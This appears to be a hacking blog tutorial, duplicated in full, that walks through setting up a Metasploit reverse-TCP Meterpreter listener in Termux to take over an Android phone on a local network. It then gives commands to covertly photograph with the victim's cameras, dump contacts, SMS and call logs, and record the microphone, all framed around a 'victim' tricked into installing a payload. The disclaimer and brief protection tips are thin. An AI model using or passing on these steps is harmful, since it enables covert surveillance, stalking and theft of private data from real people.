Hello Friends! I hope you are doing well. So, today's topic is How to hack Android Device on LAN by using Metasploit and Termux application.
There are many ways to hack a computing system like putting in any reasonably trojan, backdoor or finding a vulnerability into the system.
All these attacks are equivalent for any mobile as to whether it's an android phone or ios and if the victim remains using windows phone then there are 2 things that are done.
First, there's no software system update on the market for windows phones which means it's vulnerable and therefore the second issue is to inform the person please upgrade.
As per Google, over 60-70% of individuals are using android and therefore the rest of all is for ios and windows phones. so primarily android has a vast market share, As I explained there is soo several ways to hack a computing system or mobile.
To hack any system you wish a laptop with any software however Linux is that the best operating system for hacking functions.
In this post, I'll show the way to produce a basic payload for android mobile to hack it without any laptop, to do that you simply just need to install TERMUX from the play store and wish to install some packages to become a root user.
Basically, this post is the next part of my previous post Creating a Payload in Metasploit using Termux. So, I recommend you to see my previous post and come back to understand this one.
Hack an Android phone? Well! I will say it is not that much difficult. Just follow the simple steps and you will get the results. Ensure that the android phone is connected to a local area network and make sure you know its IP address.
Note: This post is for educational purposes only Do not try this on an individual phone. All the tests I have done on my own phone.
Devices and Tools:
A non-rooted Samsung Galaxy J2 Pro with a 16GB microSD card connected to my wireless network.
Termux Application in my Android Phone.
Metasploit Framework.
Mi Phone it will act as a Victim Phone.
Step By Step to Hack Android Phone on LAN:
#1. Go to the Termux Application.
#2. Got to the Metasploit Directory using Cd command
#3. Type msfconsole and wait for a few minutes to get a Metasploit screen.
#4. use exploit/multi/handler
I am running exploit for the multi/handler and execute our generated executable on the victim. The multi/handler handles the exploit for us and presents us with our shell.
#5. Set the reverse TCP android payload:
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
#6. Set the local and remote hosts:
msf exploit(handler) > set lhost 192.168.0.20 lhost => 192.168.0.20
192.168.0.20 address is your phone IP address. Make sure when you are creating a payload type the LHOST= < your IP address >
You can check my post of creating a payload in Metasploit which is the first part of this post. Without reading that post it will be difficult for you to understand this post.
#7. Set the local port:
msf exploit(handler) > set lport 4444
lport => 4444
#8. Exploit
Now that you have a session open. Make sure the user clicks on the application/payload that you have made it for them and then you can begin with meterpreter.
HACKING COMMANDS:-
Thus, you have got full access control to your Victim’s mobile. you'll be able to enter: command, for all the out there commands available to you for hacking. however, I'll try this for you we will use these below commands for hacking:-
Controlling the Victim’s Camera Firstly, to capture the picture from Front-Camera of Victim’s phone simply type this command:-
webcam_snap -i 2 -p storage/downloads/images232-F.jpg
Secondly,
If you wish to access back camera of Victim’s phone simply replace two within the previous command by one
webcam_snap -i 1 -p storage/downloads/image20200101.jpg
You can checkout your gallery or file manager(by default within the transfer folder) to envision the image captured by your Victim’s phone.
#2. obtaining all contacts from Victim’s phone
For accessing contacts from your Victim’s phone simply type this command:-
dump_contacts -o storage/downloads/Contacts.txt
A list of contacts is saved in your download folder particularly Contacts.txt.
#3. To access SMS from Victim’s phone
To scan all SMS from Victim’s phone similar to on top of type this command:-
dump_sms -o storage/downloads/SMS.txt
All the messages can by default get a hold on in your downloads folder particularly SMS.txt
#4. Fetching Call Logs
To get the call log details of your Victim’s android phone
dump_calllog -o storage/downloads/CallLog.txt
All the decision log details can by default get a hold on in your downloads folder particularly CallLog.txt
5. Accessing the recording files of the Victim’s phone
You can conjointly record audio through the Victim’s phone and listen to it on your phone. simply type this command:-
record_mic -d 10 -f storage/downloads/Spy-Record.mp3
By default, this command can record 10 seconds of audio.
You can modify the length of recording simply replace 10 by the time that you simply need like twenty for 20 seconds recording so on.
How you can protect yourself?
Only install apps and software from the google play store.
Make sure you don’t have to enable installs from unknown sources enabled.
Keep your phone with you at all times.
Avoid opening any suspicious links in emails or messages.
Please let me recognize if you found this post helpful or not, leave a comment below to let me recognize another space you'd have an interest in reading posts regarding.
Subscribe my News feed to get the latest post updates.
My Facebook Page:https://www.facebook.com/beginnerstrackofficial/
My Linkedin Page:https://www.linkedin.com/in/beginners-track-a661331a8
My Twitter Page:https://twitter.com/beginnerstracko?s=09
My Instagram Page:https://www.instagram.com/beginnerstrackofficial/?hl=en
My Pinterest Page:https://www.pinterest.com/beginnerstrackofficial/
Author: ADITYA YADAV
I am a blogger and Tech Geek and hacking lover. He loves to keep eyes on Hacking tips and tricks. He is a night time tech blogger."(Blogger by Passion)"
There are many ways to hack a computing system like putting in any reasonably trojan, backdoor or finding a vulnerability into the system.
All these attacks are equivalent for any mobile as to whether it's an android phone or ios and if the victim remains using windows phone then there are 2 things that are done.
First, there's no software system update on the market for windows phones which means it's vulnerable and therefore the second issue is to inform the person please upgrade.
As per Google, over 60-70% of individuals are using android and therefore the rest of all is for ios and windows phones. so primarily android has a vast market share, As I explained there is soo several ways to hack a computing system or mobile.
To hack any system you wish a laptop with any software however Linux is that the best operating system for hacking functions.
In this post, I'll show the way to produce a basic payload for android mobile to hack it without any laptop, to do that you simply just need to install TERMUX from the play store and wish to install some packages to become a root user.
Basically, this post is the next part of my previous post Creating a Payload in Metasploit using Termux. So, I recommend you to see my previous post and come back to understand this one.
Hack an Android phone? Well! I will say it is not that much difficult. Just follow the simple steps and you will get the results. Ensure that the android phone is connected to a local area network and make sure you know its IP address.
Note: This post is for educational purposes only Do not try this on an individual phone. All the tests I have done on my own phone.
Devices and Tools:
A non-rooted Samsung Galaxy J2 Pro with a 16GB microSD card connected to my wireless network.
Termux Application in my Android Phone.
Metasploit Framework.
Mi Phone it will act as a Victim Phone.
Step By Step to Hack Android Phone on LAN:
#1. Go to the Termux Application.
#2. Got to the Metasploit Directory using Cd command
#3. Type msfconsole and wait for a few minutes to get a Metasploit screen.
#4. use exploit/multi/handler
I am running exploit for the multi/handler and execute our generated executable on the victim. The multi/handler handles the exploit for us and presents us with our shell.
#5. Set the reverse TCP android payload:
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
#6. Set the local and remote hosts:
msf exploit(handler) > set lhost 192.168.0.20 lhost => 192.168.0.20
192.168.0.20 address is your phone IP address. Make sure when you are creating a payload type the LHOST= < your IP address >
You can check my post of creating a payload in Metasploit which is the first part of this post. Without reading that post it will be difficult for you to understand this post.
#7. Set the local port:
msf exploit(handler) > set lport 4444
lport => 4444
#8. Exploit
Now that you have a session open. Make sure the user clicks on the application/payload that you have made it for them and then you can begin with meterpreter.
HACKING COMMANDS:-
Thus, you have got full access control to your Victim’s mobile. you'll be able to enter: command, for all the out there commands available to you for hacking. however, I'll try this for you we will use these below commands for hacking:-
Controlling the Victim’s Camera Firstly, to capture the picture from Front-Camera of Victim’s phone simply type this command:-
webcam_snap -i 2 -p storage/downloads/images232-F.jpg
Secondly,
If you wish to access back camera of Victim’s phone simply replace two within the previous command by one
webcam_snap -i 1 -p storage/downloads/image20200101.jpg
You can checkout your gallery or file manager(by default within the transfer folder) to envision the image captured by your Victim’s phone.
#2. obtaining all contacts from Victim’s phone
For accessing contacts from your Victim’s phone simply type this command:-
dump_contacts -o storage/downloads/Contacts.txt
A list of contacts is saved in your download folder particularly Contacts.txt.
#3. To access SMS from Victim’s phone
To scan all SMS from Victim’s phone similar to on top of type this command:-
dump_sms -o storage/downloads/SMS.txt
All the messages can by default get a hold on in your downloads folder particularly SMS.txt
#4. Fetching Call Logs
To get the call log details of your Victim’s android phone
dump_calllog -o storage/downloads/CallLog.txt
All the decision log details can by default get a hold on in your downloads folder particularly CallLog.txt
5. Accessing the recording files of the Victim’s phone
You can conjointly record audio through the Victim’s phone and listen to it on your phone. simply type this command:-
record_mic -d 10 -f storage/downloads/Spy-Record.mp3
By default, this command can record 10 seconds of audio.
You can modify the length of recording simply replace 10 by the time that you simply need like twenty for 20 seconds recording so on.
How you can protect yourself?
Only install apps and software from the google play store.
Make sure you don’t have to enable installs from unknown sources enabled.
Keep your phone with you at all times.
Avoid opening any suspicious links in emails or messages.
Please let me recognize if you found this post helpful or not, leave a comment below to let me recognize another space you'd have an interest in reading posts regarding.
Subscribe my News feed to get the latest post updates.
My Facebook Page:https://www.facebook.com/beginnerstrackofficial/
My Linkedin Page:https://www.linkedin.com/in/beginners-track-a661331a8
My Twitter Page:https://twitter.com/beginnerstracko?s=09
My Instagram Page:https://www.instagram.com/beginnerstrackofficial/?hl=en
My Pinterest Page:https://www.pinterest.com/beginnerstrackofficial/
Author: ADITYA YADAV
I am a blogger and Tech Geek and hacking lover. He loves to keep eyes on Hacking tips and tricks. He is a night time tech blogger."(Blogger by Passion)"
This is dummy text. It is not meant to be read. Accordingly, it is difficult to figure out when to end it. But then, this is dummy text. It is not meant to be read. Period.
ConversionConversion EmoticonEmoticon